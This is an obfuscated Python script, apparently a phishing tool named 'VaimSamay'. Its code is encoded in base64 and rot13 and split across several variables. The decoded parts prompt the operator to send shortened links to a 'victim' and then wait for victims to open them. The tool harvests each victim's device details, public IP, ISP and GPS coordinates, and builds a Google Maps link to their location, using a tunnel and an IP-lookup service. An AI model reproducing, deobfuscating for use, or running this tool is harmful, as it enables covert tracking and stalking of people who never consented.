magic = 'CgppbXBvcnQgcmFuZG9tCmltcG9ydCBvcywgc3lzCmltcG9ydCByYW5kb20KZnJvbSB0aW1lIGltcG9ydCBzbGVlcAppbXBvcnQganNvbgppbXBvcnQgYXJncGFyc2UKaW1wb3J0IHJlcXVlc3RzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHN1YnAKaW1wb3J0IGNzdgppbXBvcnQgdGltZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgoKI2NvbG91cnMgLS0tLS0tLS0tLS0tY29kZSdzLS0tIApyID0gIlwwMzNbMTszMW0iCmcgPSAiXDAzM1sxOzMybSIKeSA9ICJcMDMzWzE7MzNtIgpiID0gIlwwMzNbMTszNG0iCmQgPSAiXDAzM1syOzM3bSIKUiA9ICJcMDMzWzE7NDFtIgpZID0gIlwwMzNbMTs0M20iCkIgPSAiXDAzM1sxOzQ0bSIKdyA9ICJcMDMzWzE7MzdtIgpSID0gJ1wwMzNbMzFtJyAjIHJlZApHID0gJ1wwMzNbMzJtJyAjIGdyZWVuCkMgPSAnXDAzM1szNm0nICMgY3lhbgpXID0gJ1wwMzNbMG0nICAjIHdoaXRlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCnBhcnNlciA9IGFyZ3BhcnNlLkFyZ3VtZW50UGFyc2VyKCkKcGFyc2VyLmFkZF9hcmd1bWVudCgnLXMnLCAnLS1zdWJkb21haW4nLCBoZWxwPSdQcm92aWRlIFN1YmRvbWFpbiBmb3IgU2VydmVvIFVSTCAoIE9wdGlvbmFsICknKQpwYXJzZXIuYWRkX2FyZ3VtZW50KCctaycsICctLWttbCcsIGhlbHA9J1Byb3ZpZGUgS01MIEZpbGVuYW1lICggT3B0aW9uYWwgKScpCnBhcnNlci5hZGRfYXJndW1lbnQoJy10JywgJy0tdHVubmVsJywgaGVscD0nU3BlY2lmeSBUdW5uZWwgTW9kZSBbIEF2YWlsYWJsZSA6IG1hbnVhbCBdJykKcGFyc2VyLmFkZF9hcmd1bWVudCgnLXAnLCAnLS1wb3J0JywgdHlwZT1pbnQsIGRlZmF1bHQ9ODA4MCwgaGVscD0nUG9ydCBmb3IgV2ViIFNlcnZlciBbIERlZmF1bHQgOiA4MDgwIF0nKQoKYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKc3ViZG9tID0gYXJncy5zdWJkb21haW4Ka21sX2ZuYW1lID0gYXJncy5rbWwKdHVubmVsX21vZGUgPSBhcmdzLnR1bm5lbApwb3J0ID0gYXJncy5wb3J0Cgpyb3cgPSBbXQppbmZvID0gJycKcmVzdWx0ID0gJycKCiNzY3JpcHQgYmFubmVyLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCgojQUxMIGNvbW1lbnQgYXJlIHVuZGVyIHRlc3RlZCBzbyBpZ25vcmUgaGltIHdoZW4gaSB1cGRhdGUgaXQgdGhlbiBpdHMgaGVscCBtZSBvdXQgdG8gdGhpbmsgYmV0dGVyIHNvIHRoYW5rcyBmb3IgdXNpbmcgdG9vbAojd2Ugd2lsbCB1cGRhdGUgc29vbgojd2Ugd2lsbCBhZGQgc3Bvb2ZpbmcgeCBib21iaW5nIAojc29vbgojYnkgdmFpbXBpZXIgcml0aWsKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCmRlZiBiYW5uZXIoKToKICAgIHByaW50KHcrZCsiICAgICAgLCwgICAgICAgICAgICAgICAgLCwiKQogICAgcHJpbnQodytkKyIgICAgKCgoKCggICAgICAgICAgICAgICkpKSkpIikKICAgIHByaW50KHcrZCsiICAgKCgoKCgoICAgICAgICAgICAgICApKSkpKSkiKQogICAgcHJpbnQodytkKyIgICAoKCgoKCggICAgICAgICAgICAgICkpKSkpKSIpCiAgICBwcmludCh3K2QrIiAgICAoKCgoKCIrdytiKyIsckBAQEBAQEBAQEBlLCIrdytkKyIpKSkpKSIpCiAgICBwcmludCh3K2QrIiAgICAgICgoKCIrdytiKyJAQEBAQEBAQEBAQEBAQEBAIit3K2QrIikpKSAgICAiK3crYisiVmFpbVNhbWF5IC0gdmVyc2lvbiAxLjAiKQogICAgcHJpbnQodytiKyIgICAgICBcQEAvIityKyIsOjo6LCIrdytiKyJcLyIrcisiLDo6OiwiK3crYisiXEBAICAgICAgICIrdysiLS0tLS0tLS0tLS0tLS0tLS0tIikKICAgIHByaW50KHcrYisiICAgICAvQEBAfCIrcisiOjo6OjoiK3crYisifHwiK3IrIjo6Ojo6Iit3K2IrInxAQEBcXCAgICAgIityKyJJbnN0YWdyYW0iK3crIiA6ICIreSsiQHZhaW1waWVyX3JpdGlrIHggQF92aWxlbl9iaG9pIikKICAgIHByaW50KHcrYisiICAgIC8gQEBAXFwiK3IrIic6OjonIit3K2IrIi9cXCIrcisiJzo6OiciK3crYisiL0BAQCBcXCAgICAiK3cpCiAgICBwcmludCh3K2IrIiAgIC8gIC9AQEBAQEBALy9cXFxAQEBAQEBAXCAgXFwgICAiK2crIlRoZSBhdXRob3IgaXMgbm90IHJlc3BvbnNpYmxlIikKICAgIHByaW50KHcrYisiICAoICAvICAnQEBAQEA9PT09QEBAQEAnICBcICApICAiK2crImZvciBhbnkgaXNzdWVzIG9yIGRhbWFnZSIpCiAgICBwcmludCh3K2IrIiAgIFwoICAgICAvICAgICAgICAgIFwgICAgICkvICAgIitnKyJjYXVzZWQgYnkgdGhpcyBwcm9ncmFtIikKICAgIHByaW50KHcrYisiICAgICBcICAgKCAgICAgICAgICAgICkgICAvIikKICAgIHByaW50KHcrYisiICAgICAgICAgIFwgICAgICAgICAgLyIrdykKCSAgICAKCgpkZWYgcmFuZG9tbGluaygpOgoJIiIiCglmb3IgbGV0dGVyIGluIHN0cmluZzoKCSAgc2xlZXAoMC4wMSkgCgkgIHN5cy5zdGRvdXQud3JpdGUobGV0dGVyKQoJICBzeXMuc3Rkb3V0LmZsdXNoKCkKCXByaW50KCJcbiIpCgkiIiIKCV92Yl8gPSBbCgoJJ2h0dHBzOi8vYml0Lmx5LzN6NzFCYlgnLAoJJ2h0dHBzOi8vY3V0dC5seS9KVzBSMWZPJywKCSdodHRwczovL3Nob3J0dXJsLmF0L2NobkNJJywKCSdodHRwczovL3JiLmd5L2cyOWM5cCcsCgknaHR0cHM6Ly90aW55dXJsLmNvbS9WYWltU2FtYXknLAoJJ2h0dHBzOi8vc2hyZWtpcy5saWZlL0o1ODQ1Vi5naWYnLAoJJ2h0dHBzOi8vcmVicmFuZC5seS9xZjRmZjkwJwoKCV0KCgoJcHJpbnQocisi4pSU4pSAIit3KyJbIV0gU2VuZCB0aGlzIExpbmsgdG8geW91ciB2aWNpdG0gOiAiK3krcmFuZG9tLmNob2ljZShfdmJfKSkKCWJhY2s9aW5wdXQocisiLi7ilJTilIAiK3crIlwwMzNbMTszN21CYWNrIFsgeSAvIG4gXTogIityKQoJaWYgYmFjaz09J3knIG9yIGJhY2s9PSdZJzoKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlpcCgpCglpZiBiYWNrPT0nbicgb3IgYmFjaz09J04nOgoJCXN5cy5leGl0KCkKCWVsc2U6CgkJYmFja2llKCkKCgoKCmRlZiBieWUoKToKCW9zLnN5c3RlbSgiY2xlYXIi'
love = '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'
god = 'YWl0KCk6CglwcmludGVkID0gRmFsc2UKCXdoaWxlIFRydWU6CgkJdGltZS5zbGVlcCgyKQoJCXNpemUgPSBvcy5wYXRoLmdldHNpemUocmVzdWx0KQoJCWlmIHNpemUgPT0gMCBhbmQgcHJpbnRlZCA9PSBGYWxzZToKCQkJcHJpbnQoIlxuIityKyLilJTilIAiK3crIlwwMzNbMTszN21bIityKyIgISIrdysiIF0gIitnKyJXYWl0aW5nIGZvciBWaWN0aW1zIit3KyIgOiAiKQoJCQlwcmludGVkID0gVHJ1ZQoJCWlmIHNpemUgPiAwOgoJCQltYWluKCkKCmRlZiBtYWluKCk6CglnbG9iYWwgaW5mbywgcmVzdWx0LCByb3csIHZhcl9sYXQsIHZhcl9sb24KCXRyeToKCQlyb3cgPSBbXQoJCXdpdGggb3BlbiAoaW5mbywgJ3InKSBhcyBmaWxlMjoKCQkJZmlsZTIgPSBmaWxlMi5yZWFkKCkKCQkJanNvbjMgPSBqc29uLmxvYWRzKGZpbGUyKQoJCQlmb3IgdmFsdWUgaW4ganNvbjNbJ2RldiddOgoKCQkJCXZhcl9vcyA9IHZhbHVlWydvcyddCgkJCQl2YXJfcGxhdGZvcm0gPSB2YWx1ZVsncGxhdGZvcm0nXQoJCQkJdHJ5OgoJCQkJCXZhcl9jb3JlcyA9IHZhbHVlWydjb3JlcyddCgkJCQlleGNlcHQgVHlwZUVycm9yOgoJCQkJCXZhcl9jb3JlcyA9ICdOb3QgQXZhaWxhYmxlJwoJCQkJdmFyX3JhbSA9IHZhbHVlWydyYW0nXQoJCQkJdmFyX3ZlbmRvciA9IHZhbHVlWyd2ZW5kb3InXQoJCQkJdmFyX3JlbmRlciA9IHZhbHVlWydyZW5kZXInXQoJCQkJdmFyX3JlcyA9IHZhbHVlWyd3ZCddICsgJ3gnICsgdmFsdWVbJ2h0J10KCQkJCXZhcl9icm93c2VyID0gdmFsdWVbJ2Jyb3dzZXInXQoJCQkJdmFyX2lwID0gdmFsdWVbJ2lwJ10KCgkJCQlyb3cuYXBwZW5kKHZhcl9vcykKCQkJCXJvdy5hcHBlbmQodmFyX3BsYXRmb3JtKSAKCQkJCXJvdy5hcHBlbmQodmFyX2NvcmVzKSAKCQkJCXJvdy5hcHBlbmQodmFyX3JhbSkgCgkJCQlyb3cuYXBwZW5kKHZhcl92ZW5kb3IpCgkJCQlyb3cuYXBwZW5kKHZhcl9yZW5kZXIpCgkJCQlyb3cuYXBwZW5kKHZhcl9yZXMpCgkJCQlyb3cuYXBwZW5kKHZhcl9icm93c2VyKQoJCQkJcm93LmFwcGVuZCh2YXJfaXApCgoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgRGV2aWNlIEluZm9ybWF0aW9uIDogJyArIFcgKyAnXG4nKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgT1MgICAgICAgICA6ICcgKyBXICsgdmFyX29zKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUGxhdGZvcm0gICA6ICcgKyBXICsgdmFyX3BsYXRmb3JtKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgQ1BVIENvcmVzICA6ICcgKyBXICsgdmFyX2NvcmVzKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUkFNICAgICAgICA6ICcgKyBXICsgdmFyX3JhbSkKCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIEdQVSBWZW5kb3IgOiAnICsgVyArIHZhcl92ZW5kb3IpCgkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBHUFUgICAgICAgIDogJyArIFcgKyB2YXJfcmVuZGVyKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUmVzb2x1dGlvbiA6ICcgKyBXICsgdmFyX3JlcykKCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIEJyb3dzZXIgICAgOiAnICsgVyArIHZhcl9icm93c2VyKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUHVibGljIElQICA6ICcgKyBXICsgdmFyX2lwKQoKCQkJCXJxc3QgPSByZXF1ZXN0cy5nZXQoJ2h0dHA6Ly9mcmVlLmlwd2hvaXMuaW8vanNvbi97fScuZm9ybWF0KHZhcl9pcCkpCgkJCQlzYyA9IHJxc3Quc3RhdHVzX2NvZGUKCgkJCQlpZiBzYyA9PSAyMDA6CgkJCQkJZGF0YSA9IHJxc3QudGV4dAoJCQkJCWRhdGEgPSBqc29uLmxvYWRzKGRhdGEpCgkJCQkJdmFyX2NvbnRpbmVudCA9IHN0cihkYXRhWydjb250aW5lbnQnXSkKCQkJCQl2YXJfY291bnRyeSA9IHN0cihkYXRhWydjb3VudHJ5J10pCgkJCQkJdmFyX3JlZ2lvbiA9IHN0cihkYXRhWydyZWdpb24nXSkKCQkJCQl2YXJfY2l0eSA9IHN0cihkYXRhWydjaXR5J10pCgkJCQkJdmFyX29yZyA9IHN0cihkYXRhWydvcmcnXSkKCQkJCQl2YXJfaXNwID0gc3RyKGRhdGFbJ2lzcCddKQoKCQkJCQlyb3cuYXBwZW5kKHZhcl9jb250aW5lbnQpCgkJCQkJcm93LmFwcGVuZCh2YXJfY291bnRyeSkKCQkJCQlyb3cuYXBwZW5kKHZhcl9yZWdpb24pCgkJCQkJcm93LmFwcGVuZCh2YXJfY2l0eSkKCQkJCQlyb3cuYXBwZW5kKHZhcl9vcmcpCgkJCQkJcm93LmFwcGVuZCh2YXJfaXNwKQoKCQkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBDb250aW5lbnQgIDogJyArIFcgKyB2YXJfY29udGluZW50KQoJCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIENvdW50cnkgICAgOiAnICsgVyArIHZhcl9jb3VudHJ5KQoJCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIFJlZ2lvbiAgICAgOiAnICsgVyArIHZhcl9yZWdpb24pCgkJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgQ2l0eSAgICAgICA6ICcgKyBXICsgdmFyX2NpdHkpCgkJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgT3JnICAgICAgICA6ICcgKyBXICsgdmFyX29yZykKCQkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBJU1AgICAgICAgIDogJyArIFcgKyB2YXJfaXNwKQoJZXhjZXB0IFZhbHVlRXJyb3I6CgkJcGFzcwoJCgl0cnk6CgkJd2l0aCBvcGVuIChyZXN1bHQsICdyJykgYXMgZmlsZToKCQkJZmlsZSA9IGZpbGUucmVhZCgpCgkJCWpzb24yID0ganNvbi5sb2FkcyhmaWxlKQoJCQlmb3IgdmFsdWUgaW4ganNvbjJbJ2luZm8nXToKCQkJCXZhcl9sYXQgPSB2YWx1ZVsnbGF0J10gKyAnIGRlZycKCQkJCXZhcl9sb24gPSB2YWx1ZVsnbG9uJ10gKyAnIGRlZycKCQkJCXZhcl9hY2MgPSB2YWx1ZVsnYWNjJ10gKyAnIG0nCgoJCQkJdmFyX2FsdCA9IHZhbHVlWydhbHQnXQoJCQkJaWYgdmFyX2FsdCA9PSAnJzoKCQkJCQl2YXJfYWx0ID0gJ05vdCBBdmFpbGFibGUnCgkJCQllbHNlOgoJCQkJCXZhcl9hbHQgPT0gdmFsdWVbJ2FsdCddICsgJyBtJwoJCQkJCgkJCQl2YXJfZGlyID0gdmFsdWVbJ2Rpcidd'
destiny = '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